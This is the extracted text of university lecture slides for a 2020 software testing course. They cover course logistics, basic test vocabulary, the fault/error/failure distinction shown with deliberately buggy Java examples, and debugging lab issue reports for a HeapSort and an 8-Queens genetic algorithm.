<td>X</td>
</tr>
<tr>
<td>Q 1</td>
<td>X</td>
<td>Q 2</td>
<td>X</td>
<td>Q 3</td>
<td>X</td>
<td>Q 4</td>
<td>X</td>
<td>Q 5</td>
<td>X</td>
<td>Q 6</td>
<td>X</td>
<td>Q 7</td>
<td>X</td>
</tr>
</tbody>
</table>
Lab Assignments (HW) to be submitted via course wiki
(1 week time / strict deadlines / 24 h grace period with penalty – afterwards 0 points)
Quizzes to be done in Moodle
(2 attempts / 15 min each / Fri 9:00 am– Mon 11:30 am / 10 best count)
Lab Sessions (Delta -… various rooms)
Preparation, Execution, Report – **Work in Pairs**
Lab 1 (week 25: Feb 18 & 19) - Debugging (10 marks)
Lab 2 (week 26: Feb 25 & 26) - Basic Black-Box-Testing (10 marks)
Lab 3 (week 27: Mar 03 & 04) - Combinatorial Testing (10 marks)
Lab 4 (week 28: Mar 10 & 11) - Basic White-Box Testing (10 marks)
Lab 5 (week 29: Mar 17 & 18) - Random Testing (10 marks) **New**
Lab 6 (week 30: Mar 24 & 26) - Automated Web-App Testing (10 marks)
Lab 7 (week 31: M 02 & A 01) - Web-App Testing in the CI/CD Pipeline (10 marks)
Lab 8 (week 32: Apr 07 & 08) - Automated GUI || Visual Testing (10 marks)
Lab 9 (week 33: Apr 14 & 15) - Mutation Testing (10 marks)
Lab 10 (week 34: Apr 21 & 22) - Static Code Analysis (10 marks)
Lab 11 (week 36: May 05 & 06) - Doc Inspection and Defect Prediction (10 marks)
**Send reports via submission button on course wiki before your next lab starts. Only PDF files will be accepted.**
GO TO LABS !!!!!
(if you don’t, you will lose marks)
Final Exam
Written exam (30%)
- Based on textbook, lectures and lab sessions
- Multiple-choice part closed book / Other parts open book & open laptop
Dates:
- Exam 2: Monday, 01-June-2020, 16:15-17:55, rooms 2004/5/6 - capacity limit: 80
- Retake Exam (resit): to be announced
Books on SW Testing
Software Testing: From Theory to Practice
• By: Maurício Aniche and Arie van Deursen (TU Delft, The Netherlands)
Link: https://sttp.site
The Fuzzing Book - Tools and Techniques for Generating Software Tests
• By: Andreas Zeller, Rahul Gopinath, Marcel Böhme, Gordon Fraser, and Christian Holler
Link: https://www.fuzzingbook.org
Introduction to Software Testing
• By: P. Ammann and J. Offutt
• Year 2017 (2nd ed.)
Software Testing
Course Responsible / Instructor: Dietmar Pfahl (dietmar.pfahl at ut dot ee) - room: 3007 (Delta)
Lab Supervisors (TAs):
- Ezequiel Scott (ezequielscott at gmail dot com)
- Claudia Kittask (claudiakittask at gmail dot com)
- Yar Muhammad (yar dot muhammad at ut dot ee)
- Amit Kumar Singh (amit dot kumar dot singh at ut dot ee)
Lectures (begin in week 24 of the academic year, on 13-Feb-2020):
- Thursday 10:15 - 12:00, Narva mnt 18 - r1021 (Delta building)
Labs (practice learning; begin in week 25, on 18/19-Feb-2020):
- Group 1: Tuesday 10.15 - 11.45, Delta r2045 - Ezequiel
- Group 2: Tuesday 10.15 - 11.45, Delta r2034 - Claudia
- Group 3: Tuesday 12.15 - 13.45, Delta r2034 - Ezequiel
- Group 5: Wednesday 12.15 - 13.45, r2048 - Yar (Note: Yar’s two lab groups had to be merged due to a scheduling conflict)
Quizzes:
SIGN UP TO MESSAGE BOARD (Slack)
(if you don’t, you will miss up to date info)
Sign-Up Link for Slack
• Before the first labs start next week, please sign up to the course Slack channel. You will get your homework feedback exclusively via Slack from the lab supervisors.
Here is the sign-up link:
• <see link in email of Monday, Feb 10>
Structure of Lecture 1
• Introduction and Motivation
• Course Information
• Basic Vocabulary
• Lab 1
Recall SE Lecture 9
Test Case
- A **Test Case** is a set of conditions or variables under which a tester will determine whether a system under test satisfies requirements or works correctly.
- Templates and examples of formal test case documentation can be found here:
http://softwaretestingfundamentals.com/test-case/
Test Case
A Test Case consists of:
- A set of inputs + expected outputs
- Execution conditions
Example of ‘execution condition’:
When pressing the ‘save’ button of a word processor, what happens depends on what you did previously (e.g., what you typed in or deleted)
Test Suite = set of Test Cases
Test Data = input to a Test Case
Test Oracle = condition that determines whether a test case passed or failed (-> fail happens if actual output is different from expected output)
Test Verdict = decision of whether a test passed or failed
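The vocabulary above maps directly onto code. A minimal sketch (the `add` function and all names here are our own illustrations, not from the slides):

```java
// Test vocabulary in code: test data = the input, test oracle = the
// comparison against the expected output, test verdict = pass/fail.
public class OracleDemo {
    public static int add(int a, int b) {          // system under test
        return a + b;
    }

    public static String runTestCase(int a, int b, int expected) {
        int actual = add(a, b);                    // execute with test data
        return (actual == expected) ? "PASS" : "FAIL"; // oracle -> verdict
    }

    public static void main(String[] args) {
        System.out.println(runTestCase(2, 3, 5));  // expected output matches
        System.out.println(runTestCase(2, 3, 6));  // deliberately wrong expectation
    }
}
```

A test suite is then just a collection of such (input, expected output, execution condition) triples.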
<table>
<thead>
<tr>
<th>ID</th>
<th>Condition to be tested</th>
<th>Execution condition</th>
<th>Test data</th>
<th>Expected result</th>
<th>Outcome</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
Test Case – Recommendations
• As far as possible, write test cases in such a way that you test only one thing at a time. Do not overlap or complicate test cases. Attempt to make your test cases ‘atomic’.
• Ensure that all positive scenarios and negative scenarios are covered.
• Language:
• Write in simple and easy to understand language.
• Use active voice: Do this, do that.
• Use exact and consistent names (of forms, fields, etc).
• Characteristics of a good test case:
• Accurate: Exacts the purpose.
• Economical: No unnecessary steps or words.
• Traceable: Capable of being traced to requirements.
• Repeatable: Can be used to perform the test over and over.
• Reusable: Can be reused if necessary.
Test Script
- A **Test Script** is a set of instructions (written using a scripting/programming language) that is performed on a system under test to verify that the system performs as expected.
- Test scripts are used in automated testing.
- Examples of Test Frameworks supporting test scripting:
- JUnit, Selenium, Sikuli, …
Test Script – Examples
Sikuli (Python):
def sample_test_script (self):
type ("TextA")
click (ImageButtonA)
assertExist (ImageResultA)
JUnit (Java):
@Test
public void shortRegularRental() {
Customer customer = new Customer("Cust");
Movie movie = new Movie("Groundhog Day", REGULAR);
Rental rental = new Rental(movie, 2); // 2 days rental = short
customer.addRental(rental);
String expected = "Rental Record for Cust\n";
expected += "\tGroundhog Day\t2.0\n";
expected += "Amount owed is 2.0\n";
expected += "You earned 1 frequent renter points";
Assert.assertEquals(expected, customer.statement());
}
What is a ‘Bug’ in SE?
First ‘Computer Bug’ in 1947
The term "bug" was used in an account by computer pioneer Grace Hopper, who publicized the cause of a malfunction in an early electromechanical computer. (Harvard’s Mark II relay computer)
Source: https://en.wikipedia.org/wiki/Software_bug
What is a Bug in SE?
Error?
Fault?
if amountOf(baby) > 1
answer = "Twins";
if equals(baby, baby1)
answer = "Twins";
print(answer);
...
Definition 1: Error – Fault – Failure
(according to IEEE Standard)
• **Failure** is an event caused by a **fault**, and a **fault** is
an anomaly of the software caused by an **error**
• **Error** – mistake made by human (e.g., programmer)
• **Fault** – wrong/missing statement in the software (code)
• **Failure** – inability to perform the program’s required functions (correctly)
• Defect ? – Bug ?
• **Debugging** / Fault localization – localizing, repairing,
re-testing.
Origins and Impact of Faults
Fault sources
- Lack of skills/training
- Oversight
- Poor communication
- ‘Lost in translation’
- Immature process
Fault context
- Impact on / of software program
Errors → Faults → Failures
User’s point of view
- Poor quality software
- User dissatisfaction
Source:
Fig 3.1 in I. Burnstein: Practical Software Testing
Definition 2: Error – Fault – Failure
(as it is often used in IDEs/tools)
- **Failure** is an event caused by an **error**, **error** is a state of the program caused by a **fault** in the code
- **Fault** – wrong/missing statement in code (resulting in error)
- **Error** – incorrect program state (may result in a failure)
- **Failure** – inability to perform its required functions (correctly)
- **Defect** ? – **Bug** ?
- **Debugging** / Fault localization – localizing, repairing, re-testing.
Definition 2: Error – Fault – Failure
Example:
```java
public static int numZero (int[] x) {
// Effects: if x==null throw NullPointerException
// else return the number of occurrences of 0 in x
int count = 0;
for (int i = 1; i < x.length; i++) {
if (x[i] == 0) {
count++;
}
}
return count;
}
```
Inputs: Correct (=Expected) result?
x = [2,7,0] Actual result?
x = [0,7,2] Fault? Error? Failure?
Program state: x, i, count, PC
Definition 2: Error – Fault – Failure
Example:
```java
public static int numZero (int[] x) {
// Effects: if x==null throw NullPointerException
// else return the number of occurrences of 0 in x
int count = 0;
for (int i = 1; i < x.length; i++) {
if (x[i] == 0) {
count++;
}
}
return count;
}
```
Inputs: Correct (=Expected) result? ?
x = [2,7,0] Actual result? ?
Program state: x, i, count, PC
Definition 2: Error – Fault – Failure
Example:
```java
class Example {
public static int numZero (int[] x) {
// Effects: if x==null throw NullPointerException
// else return the number of occurrences of 0 in x
int count = 0;
for (int i = 1; i < x.length; i++) {
if (x[i] == 0) {
count++;
}
}
return count;
}
}
```
Inputs:
- Correct (=Expected) result? 1
- x = [2,7,0]
- Actual result? ?
Program state: x, i, count, PC
Definition 2: Error – Fault – Failure
Example:
```java
public static int numZero (int[] x) {
// Effects: if x==null throw NullPointerException
// else return the number of occurrences of 0 in x
int count = 0;
for (int i = 1; i < x.length; i++) {
if (x[i] == 0) {
count++;
}
}
return count;
}
```
Inputs:
- Correct (=Expected) result? 1
- x = [2,7,0] Actual result? 1
Program state: x, i, count, PC
Definition 2: Error – Fault – Failure
Example:
```java
public static int numZero (int[] x) {
// Effects: if x==null throw NullPointerException
// else return the number of occurrences of 0 in x
int count = 0;
for (int i = 1; i < x.length; i++) {
if (x[i] == 0) {
count++;
}
}
return count;
}
```
Inputs:
- Correct (=Expected) result?
- 1
- Actual result?
- 1
- Fault? Error? Failure?
- ? / ? / No
Program state: x, i, count, PC
Definition 2: Error – Fault – Failure
Example:
```java
public static int numZero (int[] x) {
// Effects: if x==null throw NullPointerException
// else return the number of occurrences of 0 in x
int count = 0;
for (int i = 1; i < x.length; i++) {
if (x[i] == 0) {
count++;
}
}
return count;
}
```
Inputs:
- x = [2,7,0] Correct (=Expected) result? 1
- x = [0,7,2] Actual result? 1
- Fault? Error? Failure? Yes / ? / No
Program state: x, i, count, PC
Definition 2: Error – Fault – Failure
Example:
```java
public static int numZero (int[] x) {
// Effects: if x==null throw NullPointerException
// else return the number of occurrences of 0 in x
int count = 0;
for (int i = 1; i < x.length; i++) {
if (x[i] == 0) {
count++;
}
}
return count;
}
```
State 1:
PC=public static ...
x=[2, 7, 0]
count=?
i=?
State 2:
PC=int count = ...
x=[2, 7, 0]
count=0
i=1
State 3:
PC=for (int i = ...
x=[2, 7, 0]
count=0
i=1
Inputs:
Correct (=Expected) result? 1
x=[2, 7, 0]
Actual result? 1
Fault? Error? Failure? Yes / Yes / No
Program state: x, i, count, PC
Definition 2: Error – Fault – Failure
Example:
```java
public static int numZero (int[] x) {
// Effects: if x==null throw NullPointerException
// else return the number of occurrences of 0 in x
int count = 0;
for (int i = 1; i < x.length; i++) {
if (x[i] == 0) {
count++;
}
}
return count;
}
```
Inputs:
Correct (=Expected) result? ?
Actual result? ?
Program state: x, i, count, PC
Definition 2: Error – Fault – Failure
Example:
```java
public static int numZero (int[] x) {
// Effects: if x==null throw NullPointerException
// else return the number of occurrences of 0 in x
int count = 0;
for (int i = 1; i < x.length; i++) {
if (x[i] == 0) {
count++;
}
}
return count;
}
```
Inputs:
- Correct (=Expected) result? 1
- Actual result? 0
Program state: x, i, count, PC
Definition 2: Error – Fault – Failure
Example:
```java
public static int numZero (int[] x) {
// Effects: if x==null throw NullPointerException
// else return the number of occurrences of 0 in x
int count = 0;
for (int i = 1; i < x.length; i++) {
if (x[i] == 0) {
count++;
}
}
return count;
}
```
Inputs: Correct (=Expected) result? 1
Actual result? 0
x = [0,7,2] Fault? Error? Failure? Yes / Yes / Yes
Program state: x, i, count, PC
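The two runs above can be reproduced side by side. A minimal sketch contrasting the slide's faulty loop (which starts at index 1) with a corrected version; the `numZeroFixed` variant is our own addition, not from the slides:

```java
// The slide's faulty numZero (loop starts at index 1, skipping x[0])
// next to a corrected version. x = [2,7,0] masks the fault (error state,
// but no failure); x = [0,7,2] exposes it as a failure.
public class NumZeroDemo {
    public static int numZeroFaulty(int[] x) {
        int count = 0;
        for (int i = 1; i < x.length; i++) {  // fault: should start at 0
            if (x[i] == 0) count++;
        }
        return count;
    }

    public static int numZeroFixed(int[] x) {
        int count = 0;
        for (int i = 0; i < x.length; i++) {  // corrected lower bound
            if (x[i] == 0) count++;
        }
        return count;
    }

    public static void main(String[] args) {
        System.out.println(numZeroFaulty(new int[]{2, 7, 0})); // 1: fault + error, no failure
        System.out.println(numZeroFaulty(new int[]{0, 7, 2})); // 0: fault + error + failure
        System.out.println(numZeroFixed(new int[]{0, 7, 2}));  // 1: correct result
    }
}
```

This is why a passing test on one input ([2,7,0]) does not prove the absence of the fault: only test data that propagates the error state to the output produces a failure.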
Definition 2: Error – Fault – Failure
We have seen ...
Fault = Yes
Error = Yes
------------------
Failure = No
or
Failure = Yes
Definition 2: Error – Fault – Failure
Could any of this happen?
<table>
<thead>
<tr>
<th>Fault</th>
<th>Error</th>
<th>Failure</th>
</tr>
</thead>
<tbody>
<tr>
<td>No</td>
<td>No</td>
<td>No</td>
</tr>
<tr>
<td>No</td>
<td>Yes</td>
<td>No</td>
</tr>
<tr>
<td>Yes</td>
<td>No</td>
<td>No</td>
</tr>
<tr>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
</tr>
</tbody>
</table>
or
<table>
<thead>
<tr>
<th>Fault</th>
<th>Error</th>
<th>Failure</th>
</tr>
</thead>
<tbody>
<tr>
<td>No</td>
<td>No</td>
<td>No</td>
</tr>
<tr>
<td>Yes</td>
<td>No</td>
<td>No</td>
</tr>
<tr>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
</tr>
</tbody>
</table>
Definition 2: Error – Fault – Failure
Could any of this happen?
<table>
<thead>
<tr>
<th>Fault</th>
<th>Error</th>
<th>Failure</th>
</tr>
</thead>
<tbody>
<tr>
<td>No</td>
<td>No</td>
<td>No</td>
</tr>
<tr>
<td></td>
<td></td>
<td>or</td>
</tr>
<tr>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
</tr>
</tbody>
</table>
or
Fault = Yes
Error = No
Failure = No or Failure = Yes
Definition 2: Error – Fault – Failure
New Example:
```java
public static int numZero (int[] x) {
// Effects: if x==null throw NullPointerException
// else return the index of the 1st occurrence of 0 in x
for (int i = 0; i < x.length-1; i++) {
if (x[i] == 0) {
return i;
}
}
return -1;
}
```
Inputs:
- Correct (=Expected) result? ?
- Actual result? ?
Program state: x, i, count, PC
Definition 2: Error – Fault – Failure
New Example:
```java
public static int numZero (int[] x) {
// Effects: if x==null throw NullPointerException
// else return the index of the 1st occurrence of 0 in x
for (int i = 0; i < x.length-1; i++) {
if (x[i] == 0) {
return i;
}
}
return -1;
}
```
Inputs:
- Correct (=Expected) result? 0
- Actual result? 0
Program state: x, i, count, PC
Definition 2: Error – Fault – Failure
New Example:
```java
public static int numZero (int[] x) {
// Effects: if x==null throw NullPointerException
// else return the index of the 1st occurrence of 0 in x
for (int i = 0; i < x.length-1; i++) {
if (x[i] == 0) {
return i;
}
}
return -1;
}
```
Inputs:
- Correct (=Expected) result? 0
- Actual result? 0
- x = [0,7,2]
- Fault? Error? Failure? Yes / No / No
Program state: x, i, count, PC
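The second example's fault is a loop bound that stops one element early. The following sketch (a hypothetical harness; the class and method names are mine, not the lecture's) shows that this fault only turns into a failure when the first zero sits in the last position:

```java
public class FirstZeroDemo {
    // Faulty version from the slides: `i < x.length - 1`
    // never inspects the last element.
    static int firstZeroFaulty(int[] x) {
        for (int i = 0; i < x.length - 1; i++) {
            if (x[i] == 0) return i;
        }
        return -1;
    }

    // Corrected loop bound: every element is inspected.
    static int firstZeroFixed(int[] x) {
        for (int i = 0; i < x.length; i++) {
            if (x[i] == 0) return i;
        }
        return -1;
    }

    public static void main(String[] args) {
        // Zero at index 0: the fault is present but never reached,
        // so there is no error state and no failure.
        System.out.println(firstZeroFaulty(new int[]{0, 7, 2})); // 0
        // Zero only in the last position: the fault now causes a failure.
        System.out.println(firstZeroFaulty(new int[]{2, 7, 0})); // -1 instead of 2
        System.out.println(firstZeroFixed(new int[]{2, 7, 0}));  // 2
    }
}
```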
Definition 2: Error – Fault – Failure
Summary of the four possible situations:
- Fault = No, Error = No, Failure = No
- Fault = Yes, Error = No, Failure = No
- Fault = Yes, Error = Yes, Failure = No
- Fault = Yes, Error = Yes, Failure = Yes
No failure during testing does not imply the absence of faults or errors!
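The fault–error–failure relationship in the `numZero` example can be checked directly. The sketch below (a hypothetical test harness, not part of the lecture code) runs the faulty loop next to a corrected one and shows that the same fault produces a failure for some inputs but not others:

```java
public class NumZeroDemo {
    // Faulty version from the slides: the loop skips index 0.
    static int numZeroFaulty(int[] x) {
        int count = 0;
        for (int i = 1; i < x.length; i++) {
            if (x[i] == 0) count++;
        }
        return count;
    }

    // Corrected version: every index is inspected.
    static int numZeroFixed(int[] x) {
        int count = 0;
        for (int i = 0; i < x.length; i++) {
            if (x[i] == 0) count++;
        }
        return count;
    }

    public static void main(String[] args) {
        // x = [2, 7, 0]: the skipped element is non-zero, so the fault
        // puts the program in an error state but causes no failure.
        System.out.println(numZeroFaulty(new int[]{2, 7, 0})); // 1, as expected
        // x = [0, 7, 2]: the skipped element is the only zero,
        // so the same fault now produces a failure.
        System.out.println(numZeroFaulty(new int[]{0, 7, 2})); // 0 instead of 1
        System.out.println(numZeroFixed(new int[]{0, 7, 2}));  // 1
    }
}
```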
Structure of Lecture 1
• Introduction and Motivation
• Course Information
• Basic Vocabulary
• Lab 1
Lab 1 – Debugging
System 1
- Issue 1
- Issue 2
- Issue 3
- Faults?
System 2
- Issue 1
- Issue 2
- Faults?
Use IntelliJ Debugger
Submission:
At 23:59 on day before next lab
Lab 1 – Debugging
- Thought process for setting breakpoints and deciding where to step in next to see the program state.
Starting Point: Issue Report
- Example Report
- Admin Data
- Short Description
- Reproduction Steps (input)
- Expected vs Actual Result
- Additional Information (screen shots, stack traces, etc.)
- Comments / Discussion
Issue Report – Sys_1: HeapSort
- Issue report 1:
Description:
The program should heapify any given list of positive integers but the resulting tree (and list) does not meet the max binary heap structure.
Input:
heapifying a list of integers - [1, 2, 5, 7, 6, 8, 11, 10, 3, 4, 9, 1, 0]
Input code:
```java
List<Integer> heapList = new ArrayList<>();
heapList.add(1);
heapList.add(2);
heapList.add(5);
heapList.add(7);
heapList.add(6);
heapList.add(8);
heapList.add(11);
heapList.add(10);
heapList.add(3);
heapList.add(4);
heapList.add(9);
heapList.add(1);
heapList.add(0);
System.out.println("List before heapifying:");
System.out.println(heapList);
Heap heap = new Heap(heapList);
System.out.println("After heapifying: ");
heap.printAsList();
heap.printAsTree();
System.out.println(heapList);
```
Expected output:
List before heapifying:
[1, 2, 5, 7, 6, 8, 11, 10, 3, 4, 9, 1, 0]
After heapifying:
[11, 10, 8, 7, 9, 1, 5, 2, 3, 4, 6, 1, 0]
Actual output:
List before heapifying:
[1, 2, 5, 7, 6, 8, 11, 10, 3, 4, 9, 1, 0]
After heapifying:
[11, 9, 5, 3, 9, 1, 6, 3, 4, 2, 1, 0]
System 1: HeapSort – Build the Heap
<table>
<thead>
<tr>
<th>Heap</th>
<th>New element</th>
<th>Swap elements</th>
</tr>
</thead>
<tbody>
<tr>
<td>null</td>
<td>6</td>
<td></td>
</tr>
<tr>
<td>6</td>
<td>5</td>
<td></td>
</tr>
<tr>
<td>6, 5</td>
<td>3</td>
<td></td>
</tr>
<tr>
<td>6, 5, 3</td>
<td>1</td>
<td></td>
</tr>
<tr>
<td>6, 5, 3, 1</td>
<td>8</td>
<td></td>
</tr>
<tr>
<td>6, 5, 3, 1, 8</td>
<td></td>
<td>5, 8</td>
</tr>
<tr>
<td>6, 8, 3, 1, 5</td>
<td></td>
<td>6, 8</td>
</tr>
<tr>
<td>8, 6, 3, 1, 5</td>
<td>7</td>
<td></td>
</tr>
<tr>
<td>8, 6, 3, 1, 5, 7</td>
<td></td>
<td>7, 3</td>
</tr>
<tr>
<td>8, 6, 7, 1, 5, 3</td>
<td>2</td>
<td></td>
</tr>
<tr>
<td>8, 6, 7, 1, 5, 3, 2</td>
<td>4</td>
<td></td>
</tr>
<tr>
<td>8, 6, 7, 1, 5, 3, 2, 4</td>
<td></td>
<td>1, 4</td>
</tr>
</tbody>
</table>
List to be sorted in ascending order:
[6, 5, 3, 1, 8, 7, 2, 4]
Heapified list:
[8, 6, 7, 4, 5, 3, 2, 1]
System 1: HeapSort – Sorting
<table>
<thead>
<tr>
<th>Heap</th>
<th>Swap elements</th>
<th>Delete element</th>
<th>Sorted array</th>
<th>Details</th>
</tr>
</thead>
<tbody>
<tr>
<td>8, 6, 7, 4, 5, 3, 2, 1</td>
<td>8, 1</td>
<td></td>
<td></td>
<td>Swap 8 and 1 to delete 8 from heap</td>
</tr>
<tr>
<td>1, 6, 7, 4, 5, 3, 2, 8</td>
<td></td>
<td>8</td>
<td></td>
<td>Delete 8 from heap & add to sorted array</td>
</tr>
<tr>
<td>1, 6, 7, 4, 5, 3, 2</td>
<td>1, 7</td>
<td></td>
<td>8</td>
<td>Swap 1 and 7 as they are not in order</td>
</tr>
<tr>
<td>7, 6, 1, 4, 5, 3, 2</td>
<td>1, 3</td>
<td></td>
<td>8</td>
<td>Swap 1 and 3 as they are not in order</td>
</tr>
<tr>
<td>7, 6, 3, 4, 5, 1, 2</td>
<td>7, 2</td>
<td></td>
<td>8</td>
<td>Swap 7 and 2 to delete 7 from heap</td>
</tr>
<tr>
<td>2, 6, 3, 4, 5, 1, 7</td>
<td></td>
<td>7</td>
<td>8</td>
<td>Delete 7 from heap & add to sorted array</td>
</tr>
<tr>
<td>2, 6, 3, 4, 5, 1</td>
<td>2, 6</td>
<td></td>
<td>7, 8</td>
<td>Swap 2 and 6 as they are not in order</td>
</tr>
<tr>
<td>…</td>
<td>…</td>
<td>…</td>
<td>…</td>
<td>…</td>
</tr>
</tbody>
</table>
System 1: HeapSort – Sorting (cont.)
<table>
<thead>
<tr>
<th>Heap</th>
<th>Swap elements</th>
<th>Delete element</th>
<th>Sorted array</th>
<th>Details</th>
</tr>
</thead>
<tbody>
<tr>
<td>3, 2, 1</td>
<td>3, 1</td>
<td></td>
<td>4, 5, 6, 7, 8</td>
<td>Swap 3 and 1 to delete 3 from heap</td>
</tr>
<tr>
<td>1, 2, 3</td>
<td></td>
<td>3</td>
<td>4, 5, 6, 7, 8</td>
<td>Delete 3 from heap & add to sorted array</td>
</tr>
<tr>
<td>1, 2</td>
<td>1, 2</td>
<td></td>
<td>3, 4, 5, 6, 7, 8</td>
<td>Swap 1 and 2 as they are not in order</td>
</tr>
<tr>
<td>2, 1</td>
<td>2, 1</td>
<td></td>
<td>3, 4, 5, 6, 7, 8</td>
<td>Swap 2 and 1 to delete 2 from heap</td>
</tr>
<tr>
<td>1, 2</td>
<td></td>
<td>2</td>
<td>3, 4, 5, 6, 7, 8</td>
<td>Delete 2 from heap & add to sorted array</td>
</tr>
<tr>
<td>1</td>
<td></td>
<td>1</td>
<td>2, 3, 4, 5, 6, 7, 8</td>
<td>Delete 1 from heap & add to sorted array</td>
</tr>
</tbody>
</table>
Completed: 1, 2, 3, 4, 5, 6, 7, 8
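The build-and-sort trace above can be reproduced with a short sift-up/sift-down implementation. This is a minimal sketch, not the lab's `Heap` class; the method names are illustrative:

```java
import java.util.Arrays;

public class HeapSortSketch {
    // Insert-style heapify: sift each new element up,
    // matching the "Build the Heap" table above.
    static void siftUp(int[] a, int i) {
        while (i > 0 && a[i] > a[(i - 1) / 2]) {
            int p = (i - 1) / 2;
            int t = a[i]; a[i] = a[p]; a[p] = t;
            i = p;
        }
    }

    // Restore the max-heap property from the root downwards.
    static void siftDown(int[] a, int i, int size) {
        while (2 * i + 1 < size) {
            int c = 2 * i + 1;                        // left child
            if (c + 1 < size && a[c + 1] > a[c]) c++; // pick the larger child
            if (a[i] >= a[c]) break;
            int t = a[i]; a[i] = a[c]; a[c] = t;
            i = c;
        }
    }

    static void heapSort(int[] a) {
        for (int i = 1; i < a.length; i++) siftUp(a, i); // build the heap
        for (int end = a.length - 1; end > 0; end--) {
            int t = a[0]; a[0] = a[end]; a[end] = t;     // "swap to delete" the max
            siftDown(a, 0, end);                          // restore heap on the rest
        }
    }

    public static void main(String[] args) {
        int[] a = {6, 5, 3, 1, 8, 7, 2, 4};
        heapSort(a);
        System.out.println(Arrays.toString(a)); // [1, 2, 3, 4, 5, 6, 7, 8]
    }
}
```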
Issue Report 1 – Sys_2: 8-Queens Problem
Issue report 1 (Hint: corresponds to 3 bugs)
Description:
When running the program, it should return a list of generations and the correct solution that it found. Instead, it throws an exception after 1000 generations.
Input:
Running the code with the population size of 100.
Input code:
Population pop = new Population(100);
runAlgorithm(pop);
Expected output:
Generation: 1 Current highest fitness: <?>
Generation: 2 Current highest fitness: <?>
...
Found suitable board state on generation <?>: <[x1,x2,x3,x4,x5,x6,x7,x8]>
Here is the found solution as a board where . marks an empty spot and X marks a queen:
<printout of 1 correct solution of 92 possible>
Actual output:
Generation: 1 Current highest fitness: 22
Generation: 2 Current highest fitness: 22
Generation: 3 Current highest fitness: 26
... Generation: 1000 Current highest fitness: 38
Issue Report 1 – Sys_2: 8-Queens Problem
- Issue report 1 (Hint: corresponds to 3 bugs)
Description:
When running the program, it should return a list of generations and the correct solution that it found. Instead, it throws an exception after 1000 generations.
Input:
Running the code with the population size of 100.
Input code:
```java
Population pop = new Population(100);
runAlgorithm(pop);
```
Expected output:
Generation: 1 Current highest fitness: <?>
Generation: 2 Current highest fitness: <?>
...
Found suitable board state on generation <?>: <[x1,x2,x3,x4,x5,x6,x7,x8]>
Here is the found solution as a board where . marks an empty cell and x marks a cell where the queen is placed:
```plaintext
. . . . . . . .
. . . . . . . .
. . . . . . . .
. . . . . . . .
x . . . . . . .
. . . . . . . .
. . . . . . . .
. . . . . . . .
```
Actual output:
Generation: 1 Current highest fitness: 22
Generation: 2 Current highest fitness: 22
Generation: 3 Current highest fitness: 26
...
Generation: 1000 Current highest fitness: 38
Exception in thread "main" java.lang.Exception: Didn't find solution in 1000 generations
at Algorithm.generation(Algorithm.java:119)
at Algorithm.generation(Algorithm.java:129)
Comments:
This issue might not be reproducible line-to-line due to randomness in the algorithm, meaning the current highest fitness can vary. But the core of the issue is reproducible (exception).
Hints:
1. There are 3 bugs that correspond to this issue
2. You can consider this issue fixed only when all 3 bugs have been fixed. To be sure that you have fixed the correct bugs, run the program multiple times: because of the randomness of the data, the expected output may sometimes appear even while bugs remain, so make sure the correct output appears every time you run the program.
3. While you have not yet fixed all the bugs, depending on the order in which you find and fix them, you might see any of the following output:
- The described exception is thrown.
- The program outputs a board state that it claims to be correct. However, the board state is not correct as all the queens are positioned in one single diagonal on the board.
- The program outputs a board state that it claims to be correct. However, the board state is not correct as there is at least one clash visible on the board.
Issue Report 2 – Sys_2: 8-Queens Problem
- Issue report 2 (Hint: corresponds to 1 bug) (This issue appears after Issue 1 has been fixed)
Description:
Based on past projects using genetic algorithms, the average number of generations should be less than 87 and the program should produce the correct output in fewer than 100 generations on at least 75% of the runs. However, the performance is much worse: the average number of generations is over 100, and the solution is found in under 100 generations less than 62% of the time. On a very few runs, the program throws an exception because it did not find a solution within 1000 generations.
Input:
Calculated average number of generations and percentage of runs where the solution was found in under 100 generations, with population size 100 and 1000 runs.
Input code:
```java
public static List<Integer> generationCounts = new ArrayList<>();
public static void main(String[] args) throws Exception {
for (int i = 0; i<1000; i++) {
pop = new Population(100);
generation(pop);
generationCounts.add(counter+1);
counter = 0;
}
System.out.println(calculateAverage(generationCounts));
System.out.println(calculatePercent(generationCounts));
generationCounts.removeAll(generationCounts);
}
```
Issue Report 2 – Sys_2: 8-Queens Problem
• Issue report 2 (Hint: corresponds to 1 bug) (This issue appears after Issue 1 has been fixed)
Description:
Based on past projects using genetic algorithms, the average number of generations should be less than 87 and the program should produce the correct output in fewer than 100 generations on at least 75% of the runs. However, the performance is much worse: the average number of generations is over 100, and the solution is found in under 100 generations less than 62% of the time. On a very few runs, the program throws an exception because it did not find a solution within 1000 generations.
Input:
Calculated average number of generations and percentage of runs finishing in under 100 generations, with population size 100.
Input code:
```java
public static List<Integer> generationCounts = new LinkedList<>();
public static void main(String[] args) throws Exception {
for (int i = 0; i < 1000; i++) {
pop = new Population(100);
generation(pop);
generationCounts.add(counter + 1);
counter = 0;
}
System.out.println(calculateAverage(generationCounts));
System.out.println(calculatePercent(generationCounts));
generationCounts.removeAll(generationCounts);
}
```
Expected output:
- Average generation count < 87
- P(generation count <= 100) > 75%

Actual output, generalized:
- Average generation count > 87
- P(generation count <= 100) < 75%

Actual output, specific:
- Average generation count: 109.916
- P(generation count < 100): 57.7%
Comments and hints:
As performance can be affected by many things, the issue reporter has provided their own insight as a hint. You may use this, but don’t have to.
a) Genetic algorithms and their performance are strongly based on evaluations of states and fitness calculations.
b) It is important to check that the code does what the developer has intended it to do. To know what is intended, use Appendix A and helpful methods in the program (main class, the run<method_name>() methods)
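The helper methods `calculateAverage` and `calculatePercent` used in the measurement harness above are not shown in the slides, so the versions below are assumptions about their intent: the mean generation count, and the fraction of runs that finished within 100 generations.

```java
import java.util.List;

public class RunStats {
    // Mean of all recorded generation counts.
    static double calculateAverage(List<Integer> counts) {
        double sum = 0;
        for (int c : counts) sum += c;
        return sum / counts.size();
    }

    // Percentage of runs that found a solution within 100 generations.
    static double calculatePercent(List<Integer> counts) {
        int within = 0;
        for (int c : counts) {
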